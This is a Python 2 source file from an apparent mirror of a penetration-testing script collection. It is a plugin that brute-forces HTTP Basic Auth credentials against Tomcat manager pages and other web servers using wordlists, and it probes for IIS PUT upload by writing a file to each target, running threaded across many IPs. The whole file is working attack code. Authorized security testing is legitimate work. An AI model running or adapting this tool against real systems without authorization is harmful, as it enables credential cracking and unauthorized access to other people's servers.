github
/
PenetrationTestingScripts
mirror of https://github.com/ym2011/PenetrationTestingScripts
1
0
Fork 0
Code Issues Projects Releases Wiki Activity
PenetrationTestingScripts/Weak_Password/Bruteforce/plugins/web.py

120 lines
4.1 KiB
Python
Raw Permalink Blame History

#coding=utf-8
import threading
from printers import printPink,printRed,printGreen
from multiprocessing.dummy import Pool
import requests
import socket
import httplib
import time
import urlparse
import urllib2
import re
import base64
class web_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.tomcatlines=self.config.file2list("conf/tomcat.conf")
self.weblines=self.config.file2list("conf/web.conf")
def weblogin(self,url,ip,port,username,password):
try:
creak=0
header={}
login_pass=username+':'+password
header['Authorization']='Basic '+base64.encodestring(login_pass)
#header base64.encodestring 会多加一个回车号
header['Authorization']=header['Authorization'].replace("\n","")
r=requests.get(url,headers=header,timeout=8)
if r.status_code==200:
self.result.append("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.acquire()
printGreen("%s service at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
creak=1
else:
self.lock.acquire()
print "%s service 's %s:%s login fail " %(ip,username,password)
self.lock.release()
except Exception,e:
pass
return creak
def webmain(self,ip,port):
#iis_put vlun scann
try:
url='http://'+ip+':'+str(port)+'/'+str(time.time())+'.txt'
r = requests.put(url,data='hi~',timeout=10)
if r.status_code==201:
self.lock.acquire()
printGreen('%s has iis_put vlun at %s\r\n' %(ip,port))
self.lock.release()
self.result.append('%s has iis_put vlun at %s\r\n' %(ip,port))
except Exception,e:
#print e
pass
#burp 401 web
try:
url='http://'+ip+':'+str(port)
url_get=url+'/manager/html'
r=requests.get(url_get,timeout=8)#tomcat
r2=requests.get(url,timeout=8)#web
if r.status_code==401:
for data in self.tomcatlines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.weblogin(url_get,ip,port,username,password)
if flag==1:
break
elif r2.status_code==401:
for data in self.weblines:
username=data.split(':')[0]
password=data.split(':')[1]
flag=self.weblogin(url,ip,port,username,password)
if flag==1:
break
else:
pass
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['http']):
print "[*] start test web burp at %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['http']:
pool.apply_async(func=self.webmain,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop test iip_put&&scanner web paths at %s" % time.ctime()
print "[*] test iip_put&&scanner web paths done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'http': ['192.168.1.1:80']}
pinglist=['192.168.1.1']
test=web_burp(c)
test.run(ipdict,pinglist,50,file="../result/test")
Reference in New Issue View Git Blame Copy Permalink